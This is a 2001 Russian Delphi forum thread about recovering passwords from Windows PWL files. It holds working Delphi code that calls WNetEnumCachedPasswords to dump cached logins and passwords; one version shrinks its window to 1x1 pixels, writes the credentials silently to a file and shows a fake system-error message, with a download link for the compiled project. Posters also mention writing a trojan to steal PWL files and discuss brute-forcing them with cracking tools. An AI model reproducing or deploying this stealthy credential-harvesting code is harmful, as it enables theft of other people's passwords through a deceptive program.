расшифровка PWL

← →
Di_wind (2001-11-03 14:23) [0]

Может кто все-таки скажет я уже неоднократно поднимал сей вопрос только все ссылалсиь на то что гд-то это уже есть но на самом деле нигде ничего про рашифровку нету так может кто скажет все-таки как?

← →
Knight (2001-11-03 14:28) [1]

Там алгоритм офигенный - раз , во-вторых поисковики юзаешь? Статья где-то была. Не на сурсес.ру часом? Но я не помню...
И вообще, юзай ПВЛтул
У меня вопрос в тему - пароль текущего юзверя не зашифрован. Где он?(находится)

← →
Dima-k17 (2001-11-03 15:06) [2]

К слову, когда-то у меня была такая проблема, когда очень хотелось написать 1-ый троян:) pwl он воровал, но расшифровать я не мог, а всё оказалось просто. Алгоритм не дам, но сам ищи на www.passwords.ru или на подобных серверах. Спроси на xakep.ru или ещё лучше на hackzone.ru

← →
Di_wind (2001-11-03 15:43) [3]

я где-то дыбал какую-то фигню которая мне его в хеш виде выдавала ...толко на хрен он мне в хэш виде нужен...к слову: троянов не пишу...

← →
Ajax (2001-11-03 16:25) [4]

2Dima-k17: жадный, да???!!!

← →
Remy (2001-11-04 09:44) [5]

Надеюсь разберешься ...

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; external mpr name "WNetEnumCachedPasswords";

type
PWinPassword = ^TWinPassword;
TWinPassword = record
EntrySize: Word;
ResourceSize: Word;
PasswordSize: Word;
EntryIndex: Byte;
EntryType: Byte;
PasswordC: Char;
end;

var
WinPassword: TWinPassword;

function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
Password: String;
PC: Array[0..$FF] of Char;
begin
inc(Count);

Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
PC[WinPassword.ResourceSize] := #0;
CharToOem(PC, PC);
Password := StrPas(PC);

Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
PC[WinPassword.PasswordSize] := #0;
CharToOem(PC, PC);
Password := Password + ": " + StrPas(PC);
Form1.Memo1.Lines.Add(Password);//на форму бросаешь memo и видишь login и possword
Result := True;
end;

← →
Ajax (2001-11-04 14:03) [6]

По-моему, приведенный код позволяет узнать кешированные пароли, а вот к расшифровке PWL никакого отношения не имеет. Сорри если не прав.

← →
Di_wind (2001-11-04 15:34) [7]

>>Remy вопервых что такое count? во вторых то что ты дал неработает выводит ":" может я неправильно набпал а может из-за count"a (я его отключил);
>>Ajax я наверно неправильно поставил вопрос мне нужно пароль той машины на которой работаешь т.е видимио пароль храняться где-тов памяти...

← →
кто-то из толпы (2001-11-04 16:50) [8]

Есть вариант не воровать PWL, а с помощью функкций (не скажу каких)
сразу получать на компе его номера телефонов login и Pass.

У меня работает, но исходник не дам.

← →
Di_wind (2001-11-04 18:13) [9]

>>кто-то из толпы а хрен-ли выпендриваешся тогда?

← →
33 (2001-11-05 01:10) [10]

To:Di_wind ©
Думать надо головой, а не языком.

Этот вопрос с разными вариантами уже обсуждался.
И исходники выкладивались. Надо только поискать,
подумать и кое-что добавить.

С мозгами нынче напряженка, а с языком - без проблем.

← →
Dima-k17 (2001-11-05 10:53) [11]

>Ajax
Нет,осторожный.

← →
Ajax (2001-11-05 15:56) [12]

Работает на 100%. Код не мой.

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; stdcall;

implementation

function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar; dw: DWord): Word; external mpr name "WNetEnumCachedPasswords";
type
PWinPassword = ^TWinPassword;
TWinPassword = record
EntrySize: Word;
ResourceSize: Word;
PasswordSize: Word;
EntryIndex: Byte;
EntryType: Byte;
PasswordC: Char;
end;

function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool; stdcall;
var
Password: String;
PC: Array[0..$FF] of Char;
begin
inc(Count);

Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
PC[WinPassword.ResourceSize] := #0;
CharToOem(PC, PC);
Password := StrPas(PC);

Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize + WinPassword.ResourceSize);
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
PC[WinPassword.PasswordSize] := #0;
CharToOem(PC, PC);
Password := Password + ": " + StrPas(PC);
Writeln(F,password);
Result := True;
end;

procedure TForm1.FormShow(Sender: TObject);
begin
form1.Height := 1;
form1.Width := 1;
AssignFile(F,"D:\result.txt");
Rewrite(F);
if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then
begin
Application.MessageBox("WARNING! System error! Can""t read data files.", "Error", mb_Ok or mb_IconWarning);
Application.Terminate;
end
else
if Count = 0 then
ListBox.Items.Add("There is no files in system directory");
CloseFile(F);
application.Terminate ;
end;

← →
Di_wind (2001-11-05 18:07) [13]

у меня выдает WARNING! System error! Can""t read data files наверно я урод....:)

← →
Ajax (2001-11-06 17:47) [14]

Давай я тебе по почте вышлю весь проект и скомпилированный EXE. Надо?

← →
andersen (2001-11-06 22:39) [15]

>Ajax
И мне плиз.

← →
Di_wind (2001-11-06 23:28) [16]

надо

← →
panov (2001-11-07 01:59) [17]

Вы только посмотрите - как надо файл .pwl расшифровать...

← →
TheNobody (2001-11-07 05:58) [18]

Да никак его не расшифровывают!!!!!
Он ХЕШИРОВАН и всё тут.
Его только подбирают по словарю или брутфорсом.
Для этого тулзов, ну море понаписано.
Одну из них зовут PWLHack.
Могу скинуть нуждающимся.
Правда исходников у меня нет.
И незнаю я как он хешируется.

← →
panov (2001-11-07 14:10) [19]

Блин, сколько "хакеров" развелось...

← →
Ajax (2001-11-07 14:38) [20]

2Di_wind&andersen: Тогда я по почте не буду слать. Если надо можете слить с http://atalexis.narod.ru/download/Sources/pswtakes.rar(Моя страничка. Я только щас разбираюсь что да как, так что над дизайном не смеятся, а лучше помочь.)

← →
Di_wind (2001-11-07 15:34) [21]

>>Ajax нерабоает :)

← →
Ajax (2001-11-07 17:26) [22]

Странно конечно, но через эксплорер действительно не работает. А вот если скопировать этот адрес и вставить в какой-нибудь менеджер закачки (ну там Reget какой-нибуть) то все ништяк.

← →
Fellomena (2001-11-09 14:42) [23]

Мда... ребята, вы даёте8) как парвильно выразился panov: хацкеров у нас полно 8)
Может кто ещё пришлёт обратный алгоритм DES-а или MD5 ?
Буду очень благодарна - денег много дам - а вам тут же Нобиля 8)))
Для тех кто в танке: pwl-ки расшифровывались с помощью обратного алгоритма, только в
старых Виндах (ещё в 95 и то не всех). А сейчас используют методы необратимого кодирования.
Поищите в www.yandex.ru что нибудь по ключу des, solt, crypt, passwd и не
позорьте нацию !

← →
Anatoly Podgoretsky (2001-11-09 22:01) [24]

TheNobody © (07.11.01 05:58)
Дал реальный метод взлома, но это не расшифровка, так как сие не возможно, так как пароли не хранятся, есть хеш он сигнатура

← →
Tosov (2001-11-10 00:42) [25]

Вопрос : как PWL могут шифроваться необратимым алгоритмом, если в них находятся логины и пароли не только на вход в сеть (комп). Там и на dialup должны быть. И как их в таком случае винда узнает??

← →
Anatoly Podgoretsky (2001-11-10 11:46) [26]

А ты уверен, что они их там хранит?
У меня например в реестре, а вот там они не кешированные, а шифрованные

← →
pakko (2001-11-10 12:37) [27]

Ip надо узнавать у жертвы на чей комп влез злой троян. А отсылать хозяину трояна и всем его друзьям!

← →
Tosov (2001-11-11 18:18) [28]

2Anatoly Podgoretsky
>А ты уверен, что они их там хранит?

Вопрос : что винда хранит в PWL ???

← →
Anatoly Podgoretsky (2001-11-11 19:25) [29]

Пароль на вход в систему

← →
Tosov (2001-11-12 16:16) [30]

А зачем он нужен супер ][акерам-троянописателям?? Они чего, хотят в систему войти лично?

← →
Anatoly Podgoretsky (2001-11-12 22:05) [31]

Для входа достаточно нажать Escape

← →
Fellomena (2001-11-14 16:36) [32]

...э, тяжёлый случай, ну да ладно, будем лечить:

Расскажу я вам сказочку про DES:
Шифpуются не паpоли. Шифpуется Salt. Salt - это две
первые буквы (5f) в 5fg63fhD3d5g - это то, что все считают шифрованным
паролем
Вот алгоритм работы DES:
a) Система вырабатывает Salt - случайные две буквы.
б) Запрашивает у пользователя пароль.
в) Шифрует Salt используя DES, пароль используется как ключ.
г) Записывает Salt, плюс pезультат шифpования в passwd.

В качестве метода шифрования кроме DES в некоторых системах используют MD5. (FreeBSD к примеру)
В PGP юзают RAS. На hackzone RC5 8))) - шутка ;)
Идентификация пользователя проходит в два этапа- сначала на запрос "Login:" пользователь вводит свой login_name, затем программа login
шифрует Salt используя в качестве ключа введённое после запроса "Password:" слово, и результат сравнивает с записанной в passwd
строкой.

Программы ломания паролей используют словари ( wordlists ).
Каждое слово из словаря используется в качестве ключа для шифровки
Salt и результат сравнивается с содержимым passwd (pwl в нашем "тяжёлом" случае 8).

Для справки - в pwl винды хранит пароли на вход в систему, на диалап, пароли на доступ к сетевым папкам,
пароли, которые кэшируются системой при обращении в чаты на всякие mail.ru (если вы их действительно кэшируете).
(что, неужели никто не юзал John The Ripper или PWLTool ? )

АПОФИОЗ: pwl-ки не расшифровывабтся; пароль узнать можно ТОЛЬКО перебором, методом грубой силы (по словарю или же просто перебором символов)!!!
На некоторые pwl-ки (программа pwltool) уходит секунда, некоторые никогда не разгадываются.
Из pwl файла можно подчерпнуть ОЧЕНЬ много всего интерестного (если юзверь не параноик, как я 8).

Кстати мой рекорд - 154 дня John крутил один passwd-шник и нашёл-таки пароль (камень - Duron650);

← →
Tosov (2001-11-14 20:48) [33]

2 Fellomena
Ты это к чему рассказала?

>Для справки - в pwl винды хранит пароли на вход в систему, на диалап, пароли на доступ к сетевым папкам,
пароли, ...
>АПОФИОЗ: pwl-ки не расшифровывабтся; пароль узнать можно ТОЛЬКО перебором

Вариант - хочешь позванить провайдеру. Пароль на диалап находится в pwl. Т.к. pwl не расшифровывается, а пароль ты каждый раз не набираешь, то значит както винда его из pwl получает.
>Кстати мой рекорд - 154 дня John крутил один passwd-шник и нашёл-таки пароль;
Значит винда пароли из pwl перебором достает? У меня на диалап пароль -14 символов-> дней через 10e+nnn винда пароль подберет и начнет звонить.
Может ты обьяснишь это?

← →
Владислав (2001-11-15 08:25) [34]

> Tosov © (14.11.01 20:48)
А что тут объяснять?
Судя по предыдущему рассказу, винда берет введенный пароль в качестве ключа. Шифрует известные ей символы. Если результат (шифрованный) совпадает с тем, который сохранен в pwl, то милости просим.

← →
Fellomena (2001-11-15 12:43) [35]

2 Владислав:
рада, что мои слова были поняты, а то у меня создалось такое впечатление, что некоторые товарищи - ну сОвСеМ не втыкают в тему.

2 Tosov:
извини, но ты что совсем ни хрена не понял ???
И не тебе, парниша, глумится надо мной, я этим занималась давно и серьёзно.
И если ты такой недалёкий, то возьми свою pwl-ку, и скорми pwltool-у, хотя не
уверена, что ты с программой справишься.
А твой сраный 14-ти символьный пароль на dial-up не на что не годен, если он в pwl-ки лежит.
Если не веришь, что я его ломану - мыль свою pwl-ку и посмотрим...

← →
CommandArm (2001-11-15 13:56) [36]

Не спорьте с Fellomena - это признаный авторитет
Мне помогла инфой

← →
Tosov (2001-11-15 20:57) [37]

2 Владислав
>винда берет введенный пароль в качестве ключа
какой пароль? откуда берет?(я говорю не про пароль на вход в систему!!!!!)

2 Fellomena
>И не тебе, парниша, глумится надо мной, я этим занималась давно и серьёзно
Я всего лишь спросил как винда ПОЛУЧАЕТ ПАРОЛЬ НА ДИАЛАП, если pwl зашифрована ТАК, ЧТО ПАРОЛЬ ПОЛУЧАЕМ ТОЛЬКО ПЕРЕБОРОМ. Ответа не последовало.

>я этим занималась давно и серьёзно
А я этим вообще не занимался поэтому и спрашиваю.
pwl-ки к сожалению у меня нет (на NT она к сожалению не предусмотрена)

>14-ти символьный пароль на dial-up не на что не годен, если он в pwl-ки лежит
Опять же ПОЧЕМУ?? Он же зашифрован с поможью современнейшего алгоритма DES?

>что я его ломану - мыль свою pwl-ку и посмотрим...
Давай так : на днях схожу с чел-ку, у которого WinME и сделаю себе pwl и пошлю ее тебе - пароль до 14 символов.
Каким образом будешь искать пароль - методом прямого перебора или есть другие способы?

← →
panov (2001-11-16 07:54) [38]

>Fellomena (15.11.01 12:43)

Ты правда такая/ой умная/ый, или прикидываешься?

А может быть, ты вообще умнее всех?

← →
Fellomena (2001-11-16 16:46) [39]

ПРОШУ ПРОЩЕНИЯ, ЕСЛИ КОГО-ТО ОСКАРБИЛА !!!
у меня такие глюки бывают 8(

2 Tosov: пойми главное: все пароли, находящиеся в pwl кодируются одним паролем, тем, что ты вводишь когда логинишься в систему
Теперь надеюсь понятна тщетность ввода 14-ти значного пароля на dial-up если на вход в систему пароль 123 ?!?
Ещё одно: если вы уже залогинились, то система "знает" вашь пароль и вы можете СРАЗУ без всякого перебора посмотреть
содержание вашей pwl-ки ! Отсюда вытекает ответ - откуда берётся пароль на dial-up...
И вообще, почитайте на http://www.passwords.ru/ статьи о Windows-овских системах защиты - там всё отлично написанно и
есть соответствующие проги.
DES - далеко не современнейший 8))) вот RC5 уже другое дело :)
Про pwl-ку: иди к другу, сделай pwl-ку, но пароль на вход сделай до 5 символов (нету у меня времени на 7-8 символьные сейчас 8)
ну и закешируй туда штучек 5-7 паролей от мыла, или чатов или ещё чего - вот и посмотрим 8)

2 panov: да какой там умная - смеёшься ?- конечно прикидываюсь !!! Ещё в школе учусь кстати...
ПРосто некоторые элементарные и общеизвестные факты не знать как-то стыдно imho...
Да и вообще, до того как начать программить по-нормальному я кое чем другим занималась, с
INet-security связанным (вообще-то из-за этого и начала программить :)

← →
Tosov (2001-11-16 17:06) [40]

Fellomena (14.11.01 16:36)
>АПОФИОЗ: pwl-ки не расшифровывабтся
Fellomena (16.11.01 16:46)
>система "знает" вашь пароль и вы можете СРАЗУ без всякого перебора посмотреть содержание вашей pwl-ки !

А я то думал, что если что-то не расшифровывается, то из того, что было после шифрования нельзя получить то, что было до шифрования (иначе как перебором). Я вероятно ошибался?
Пожалуйста как спец по Inet-security обьясни формулировку НЕ РАСШИФРОВЫВАЕТСЯ.
Пароли в юнихе шифруются необратимо, но в них не хранится пароли на dialup и другая лажа.Оказывается и в винде тоже?

>Про pwl-ку: иди к другу, сделай pwl-ку, но пароль на вход сделай до 5 символов
Не смешно!! Пароль из 5 символов я и сам расшифрую (если не ошибаюсь для этого потребуются секунды). А 10 устроит?

расшифровка PWL Найти похожие ветки